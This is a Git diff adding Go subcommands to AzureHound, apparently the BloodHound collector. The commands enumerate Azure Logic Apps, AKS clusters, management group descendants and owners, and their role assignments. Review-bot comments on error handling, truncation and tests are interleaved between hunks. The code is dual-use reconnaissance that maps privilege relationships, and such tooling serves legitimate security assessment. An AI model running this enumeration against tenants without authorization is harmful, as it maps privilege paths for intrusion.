+ for result := range pipeline.OrDone(ctx.Done(), logicapps) {
+ if logicapp, ok := result.(AzureWrapper).Data.(models.LogicApp); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating logic app role assignments", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, logicapp.Id); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ var (
+ logicappRoleAssignments = models.AzureRoleAssignments{
+ ObjectId: id,
+ }
+ count = 0
+ )
+ for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing role assignments for this logic app", "logicappId", id)
+ } else {
+ roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId)
+
+ logicappRoleAssignment := models.AzureRoleAssignment{
+ Assignee: item.Ok,
+ ObjectId: id,
+ RoleDefinitionId: roleDefinitionId,
+ }
+ log.V(2).Info("found logic app role assignment", "logicappRoleAssignment", logicappRoleAssignment)
+ count++
+ logicappRoleAssignments.RoleAssignments = append(logicappRoleAssignments.RoleAssignments, logicappRoleAssignment)
+ }
+ }
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZLogicAppRoleAssignment,
+ Data: logicappRoleAssignments,
+ }); !ok {
+ return
+ }
+ log.V(1).Info("finished listing logic app role assignments", "logicappId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all logic app role assignments")
+ }()
+
+ return out
+}
diff --git a/cmd/list-logic-apps.go b/cmd/list-logic-apps.go
new file mode 100644
index 0000000..8ce4d95
--- /dev/null
+++ b/cmd/list-logic-apps.go
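Review bot: In listLogicAppRoleAssignments an `item.Error` is logged as "unable to continue processing role assignments for this logic app", but the loop does continue and the record is then sent with whatever assignments were read before the error. Downstream, that partial list looks exactly like a complete one, which for role-assignment data means privilege relationships can be missing from the output without any marker. I would record the failure and surface it at the send site, e.g. set `failed = true` in the error branch and, when set, log `log.Info("emitting partial role assignments", "logicappId", id, "count", count)` before `pipeline.SendAny` (or skip the send, if consumers prefer no record over a partial one). listManagedClusterRoleAssignments has the same flow.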
@@ -0,0 +1,136 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listLogicAppsCmd)
+}
+
+var listLogicAppsCmd = &cobra.Command{
+ Use: "logic-apps",
+ Long: "Lists Azure Logic Apps",
+ Run: listLogicAppsCmdImpl,
+ SilenceUsage: true,
+}
+
+func listLogicAppsCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ if err := testConnections(); err != nil {
+ exit(err)
+ } else if azClient, err := newAzureClient(); err != nil {
+ exit(err)
+ } else {
+ log.Info("collecting azure logic apps...")
+ start := time.Now()
+ stream := listLogicApps(ctx, azClient, listSubscriptions(ctx, azClient))
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+ }
+}
+
+func listLogicApps(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+ for result := range pipeline.OrDone(ctx.Done(), subscriptions) {
+ if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating logic apps", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ count := 0
+ // Azure only allows requesting 100 logic apps at a time. The previous
+ // value of math.MaxInt32 was causing issues and not collecting
+ // logic apps at all. This is not a great fix, since it requires proper
+ // pagination in case there are more than 100 logic apps, but it's better
+ // as an interim solution than it was before.
+ for item := range client.ListAzureLogicApps(ctx, id, "", 100) {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing logic apps for this subscription", "subscriptionId", id)
+ } else {
+ logicapp := models.LogicApp{
+ LogicApp: item.Ok,
+ SubscriptionId: "/subscriptions/" + id,
+ ResourceGroupId: item.Ok.ResourceGroupId(),
+ TenantId: client.TenantInfo().TenantId,
+ }
+ log.V(2).Info("found logicapp", "logicapp", logicapp)
+ count++
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZLogicApp,
+ Data: logicapp,
+ }); !ok {
+ return
+ }
+ }
+ }
+ log.V(1).Info("finished listing logic apps", "subscriptionId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all logic apps")
+ }()
+
+ return out
+}
diff --git a/cmd/list-managed-cluster-role-assignments.go b/cmd/list-managed-cluster-role-assignments.go
new file mode 100644
index 0000000..29713ab
--- /dev/null
+++ b/cmd/list-managed-cluster-role-assignments.go
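Review bot: The hard-coded `100` in `client.ListAzureLogicApps(ctx, id, "", 100)` caps collection, and by the comment's own account there is no pagination yet, so a subscription with more logic apps would be reported incompletely with nothing in the output to show it. Until pagination lands I would flag the condition after the inner loop, `if count >= 100 { log.Info("logic app listing may be truncated", "subscriptionId", id, "count", count) }`, and move the limit into a named constant next to the comment. Whether the client follows continuation links internally is not visible from this hunk, so the check should be confirmed against ListAzureLogicApps.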
@@ -0,0 +1,141 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "path"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listManagedClusterRoleAssignment)
+}
+
+var listManagedClusterRoleAssignment = &cobra.Command{
+ Use: "managed-cluster-role-assignments",
+ Long: "Lists AKS Managed Cluster Role Assignments",
+ Run: listManagedClusterRoleAssignmentImpl,
+ SilenceUsage: true,
+}
+
+func listManagedClusterRoleAssignmentImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ if err := testConnections(); err != nil {
+ exit(err)
+ } else if azClient, err := newAzureClient(); err != nil {
+ exit(err)
+ } else {
+ log.Info("collecting azure managed cluster role assignments...")
+ start := time.Now()
+ subscriptions := listSubscriptions(ctx, azClient)
+ stream := listManagedClusterRoleAssignments(ctx, azClient, listManagedClusters(ctx, azClient, subscriptions))
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+ }
+}
+
+func listManagedClusterRoleAssignments(ctx context.Context, client client.AzureClient, managedClusters <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+
+ for result := range pipeline.OrDone(ctx.Done(), managedClusters) {
+ if managedCluster, ok := result.(AzureWrapper).Data.(models.ManagedCluster); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating managed cluster role assignments", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, managedCluster.Id); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ var (
+ managedClusterRoleAssignments = models.AzureRoleAssignments{
+ ObjectId: id,
+ }
+ count = 0
+ )
+ for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing role assignments for this managed cluster", "managedClusterId", id)
+ } else {
+ roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId)
+
+ managedClusterRoleAssignment := models.AzureRoleAssignment{
+ Assignee: item.Ok,
+ ObjectId: id,
+ RoleDefinitionId: roleDefinitionId,
+ }
+ log.V(2).Info("found managed cluster role assignment", "managedClusterRoleAssignment", managedClusterRoleAssignment)
+ count++
+ managedClusterRoleAssignments.RoleAssignments = append(managedClusterRoleAssignments.RoleAssignments, managedClusterRoleAssignment)
+ }
+ }
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZManagedClusterRoleAssignment,
+ Data: managedClusterRoleAssignments,
+ }); !ok {
+ return
+ }
+ log.V(1).Info("finished listing managed cluster role assignments", "managedClusterId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all managed cluster role assignments")
+ }()
+
+ return out
+}
diff --git a/cmd/list-managed-clusters.go b/cmd/list-managed-clusters.go
new file mode 100644
index 0000000..490224b
--- /dev/null
+++ b/cmd/list-managed-clusters.go
@@ -0,0 +1,131 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "context"
+ "fmt"
+ "os"
+ "os/signal"
+ "sync"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/client"
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/bloodhoundad/azurehound/v2/models"
+ "github.com/bloodhoundad/azurehound/v2/panicrecovery"
+ "github.com/bloodhoundad/azurehound/v2/pipeline"
+ "github.com/spf13/cobra"
+)
+
+func init() {
+ listRootCmd.AddCommand(listManagedClustersCmd)
+}
+
+var listManagedClustersCmd = &cobra.Command{
+ Use: "managed-clusters",
+ Long: "Lists Azure Kubernetes Service Managed Clusters",
+ Run: listManagedClustersCmdImpl,
+ SilenceUsage: true,
+}
+
+func listManagedClustersCmdImpl(cmd *cobra.Command, args []string) {
+ ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)
+ defer gracefulShutdown(stop)
+
+ log.V(1).Info("testing connections")
+ if err := testConnections(); err != nil {
+ exit(err)
+ } else if azClient, err := newAzureClient(); err != nil {
+ exit(err)
+ } else {
+ log.Info("collecting azure managed clusters...")
+ start := time.Now()
+ stream := listManagedClusters(ctx, azClient, listSubscriptions(ctx, azClient))
+ panicrecovery.HandleBubbledPanic(ctx, stop, log)
+ outputStream(ctx, stream)
+ duration := time.Since(start)
+ log.Info("collection completed", "duration", duration.String())
+ }
+}
+
+func listManagedClusters(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} {
+ var (
+ out = make(chan interface{})
+ ids = make(chan string)
+ streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int))
+ wg sync.WaitGroup
+ )
+
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer close(ids)
+ for result := range pipeline.OrDone(ctx.Done(), subscriptions) {
+ if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok {
+ log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating managed clusters", "result", result)
+ return
+ } else {
+ if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok {
+ return
+ }
+ }
+ }
+ }()
+
+ wg.Add(len(streams))
+ for i := range streams {
+ stream := streams[i]
+ go func() {
+ defer panicrecovery.PanicRecovery()
+ defer wg.Done()
+ for id := range stream {
+ count := 0
+ for item := range client.ListAzureManagedClusters(ctx, id) {
+ if item.Error != nil {
+ log.Error(item.Error, "unable to continue processing managed clusters for this subscription", "subscriptionId", id)
+ } else {
+ managedCluster := models.ManagedCluster{
+ ManagedCluster: item.Ok,
+ SubscriptionId: "/subscriptions/" + id,
+ ResourceGroupId: item.Ok.ResourceGroupId(),
+ TenantId: client.TenantInfo().TenantId,
+ }
+ log.V(2).Info("found managed cluster", "managedCluster", managedCluster)
+ count++
+ if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{
+ Kind: enums.KindAZManagedCluster,
+ Data: managedCluster,
+ }); !ok {
+ return
+ }
+ }
+ }
+ log.V(1).Info("finished listing managed clusters", "subscriptionId", id, "count", count)
+ }
+ }()
+ }
+
+ go func() {
+ wg.Wait()
+ close(out)
+ log.Info("finished listing all managed clusters")
+ }()
+
+ return out
+}
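Review bot: listManagedClusters has no doc comment, and its contract is not obvious from the signature: per-subscription listing errors are only logged, so the returned channel closes normally even when a subscription could not be read. I would add `// listManagedClusters emits one AzureWrapper of kind KindAZManagedCluster per cluster found in the given subscriptions; listing errors are logged and skipped, and the channel is closed once all workers finish.` It would also help to note in that comment that `SubscriptionId` is stored here as "/subscriptions/" + id, whereas listKeyVaults in this patch stores the bare id, so readers do not assume one format across record kinds.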
diff --git a/cmd/list-management-group-descendants.go b/cmd/list-management-group-descendants.go
new file mode 100644
index 0000000..3cbcee7
--- /dev/null
+++ b/cmd/list-management-group-descendants.go
@@ -0,0 +1,121 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listManagementGroupDescendantsCmd) +} + +var listManagementGroupDescendantsCmd = &cobra.Command{ + Use: "management-group-descendants", + Long: "Lists Azure Management Group Descendants", + Run: listManagementGroupDescendantsCmdImpl, + SilenceUsage: true, +} + +func listManagementGroupDescendantsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure management group descendants...") + start := time.Now() + stream := listManagementGroupDescendants(ctx, azClient, listManagementGroups(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := 
time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listManagementGroupDescendants(ctx context.Context, client client.AzureClient, managementGroups <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), managementGroups) { + if managementGroup, ok := result.(AzureWrapper).Data.(models.ManagementGroup); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating management group descendants", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, managementGroup.Name); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureManagementGroupDescendants(ctx, id, 3000) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing descendants for this management group", "managementGroupId", id) + } else { + log.V(2).Info("found management group descendant", "type", item.Ok.Type, "id", item.Ok.Id, "parent", item.Ok.Properties.Parent.Id) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZManagementGroupDescendant, + Data: item.Ok, + }); !ok { + return + } + } + } + log.V(1).Info("finished listing management group descendants", "managementGroupId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all management group descendants") + }() + + return out +} 
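Review bot: In the first goroutine of `listManagementGroupDescendants`, `result.(AzureWrapper).Data.(models.ManagementGroup)` guards only the second assertion; the single-value `result.(AzureWrapper)` panics if anything other than an `AzureWrapper` arrives on `managementGroups`, so the `!ok` branch and its log line are never reached in that case. Assert in two steps, `wrapper, ok := result.(AzureWrapper)` and then `managementGroup, ok := wrapper.Data.(models.ManagementGroup)`, logging and returning on either failure. The same expression appears in `listManagementGroupRoleAssignments` in the cmd/list-management-group-role-assignments.go hunk. The deferred `panicrecovery.PanicRecovery()` presumably catches the panic, but what it does afterwards is not visible in this part of the diff.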
diff --git a/cmd/list-management-group-descendants_test.go b/cmd/list-management-group-descendants_test.go
new file mode 100644
index 0000000..3b3e53a
--- /dev/null
+++ b/cmd/list-management-group-descendants_test.go
@@ -0,0 +1,103 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListManagementGroupDescendants(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockManagementGroupsChannel := make(chan interface{}) + mockManagementGroupDescendantChannel := make(chan client.AzureResult[azure.DescendantInfo]) + mockManagementGroupDescendantChannel2 := make(chan client.AzureResult[azure.DescendantInfo]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureManagementGroupDescendants(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockManagementGroupDescendantChannel).Times(1) + mockClient.EXPECT().ListAzureManagementGroupDescendants(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockManagementGroupDescendantChannel2).Times(1) + channel := 
listManagementGroupDescendants(ctx, mockClient, mockManagementGroupsChannel) + + go func() { + defer close(mockManagementGroupsChannel) + mockManagementGroupsChannel <- AzureWrapper{ + Data: models.ManagementGroup{}, + } + mockManagementGroupsChannel <- AzureWrapper{ + Data: models.ManagementGroup{}, + } + }() + go func() { + defer close(mockManagementGroupDescendantChannel) + mockManagementGroupDescendantChannel <- client.AzureResult[azure.DescendantInfo]{} + mockManagementGroupDescendantChannel <- client.AzureResult[azure.DescendantInfo]{} + }() + go func() { + defer close(mockManagementGroupDescendantChannel2) + mockManagementGroupDescendantChannel2 <- client.AzureResult[azure.DescendantInfo]{} + mockManagementGroupDescendantChannel2 <- client.AzureResult[azure.DescendantInfo]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(azure.DescendantInfo); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, azure.DescendantInfo{}) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(azure.DescendantInfo); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, azure.DescendantInfo{}) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(azure.DescendantInfo); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, azure.DescendantInfo{}) + } + + if _, ok := <-channel; ok { + t.Error("expected 
channel to close from an error result but it did not") + } +} diff --git a/cmd/list-management-group-owners.go b/cmd/list-management-group-owners.go new file mode 100644 index 0000000..b076ed6 --- /dev/null +++ b/cmd/list-management-group-owners.go 
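Review bot: `TestListManagementGroupDescendants` matches every argument of `ListAzureManagementGroupDescendants` with `gomock.Any()` and feeds two empty `models.ManagementGroup{}` values, so it would still pass if the collector passed the wrong field as the group id or dropped the `3000` argument. Giving the two groups distinct names and expecting those values explicitly would pin the call; the expectations would have to tolerate either order, since how `pipeline.Demux` distributes ids is not visible here. The final failure message, "expected channel to close from an error result but it did not", also does not describe the code under test, which logs an error item and keeps reading; the channel closes because both mock channels are closed.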
@@ -0,0 +1,80 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listManagementGroupOwnersCmd) +} + +var listManagementGroupOwnersCmd = &cobra.Command{ + Use: "management-group-owners", + Long: "Lists Azure Management Group Owners", + Run: listManagementGroupOwnersCmdImpl, + SilenceUsage: true, +} + +func listManagementGroupOwnersCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure management group owners...") + start := time.Now() + managementGroups := listManagementGroups(ctx, azClient) + roleAssignments := listManagementGroupRoleAssignments(ctx, azClient, managementGroups) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listManagementGroupOwners(ctx, 
roleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listManagementGroupOwners( + ctx context.Context, + roleAssignments <-chan azureWrapper[models.ManagementGroupRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.ManagementGroupRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, mgmtGroupRoleAssignmentFilter(constants.OwnerRoleID)) + owners := internal.Map(filteredAssignments, func(ra models.ManagementGroupRoleAssignment) models.ManagementGroupOwner { + return models.ManagementGroupOwner{ + Owner: ra.RoleAssignment, + ManagementGroupId: ra.ManagementGroupId, + } + }) + return NewAzureWrapper(enums.KindAZManagementGroupOwner, models.ManagementGroupOwners{ + ManagementGroupId: ra.Data.ManagementGroupId, + Owners: owners, + }) + }) +} diff --git a/cmd/list-management-group-owners_test.go b/cmd/list-management-group-owners_test.go new file mode 100644 index 0000000..fa7ec0c --- /dev/null +++ b/cmd/list-management-group-owners_test.go 
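Review bot: `signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill)` in `listManagementGroupOwnersCmdImpl` registers a signal that cannot be trapped, so the `os.Kill` entry has no effect. As written only an interrupt cancels `ctx`; a SIGTERM from a service manager or container runtime ends the process without cancelling `ctx` or running the deferred `gracefulShutdown(stop)`. Consider `signal.NotifyContext(cmd.Context(), os.Interrupt, syscall.SIGTERM)`, which needs the `syscall` import. The same call is in the `...CmdImpl` functions of the descendants, role-assignments, user-access-admins and management-groups hunks.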
@@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListManagementGroupOwners(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockRoleAssignmentsChannel := make(chan azureWrapper[models.ManagementGroupRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listManagementGroupOwners(ctx, mockRoleAssignmentsChannel) + + go func() { + defer close(mockRoleAssignmentsChannel) + + mockRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZManagementGroupRoleAssignment, + models.ManagementGroupRoleAssignments{ + ManagementGroupId: "foo", + RoleAssignments: []models.ManagementGroupRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.OwnerRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: 
constants.OwnerRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-management-group-role-assignments.go b/cmd/list-management-group-role-assignments.go new file mode 100644 index 0000000..d003eb7 --- /dev/null +++ b/cmd/list-management-group-role-assignments.go 
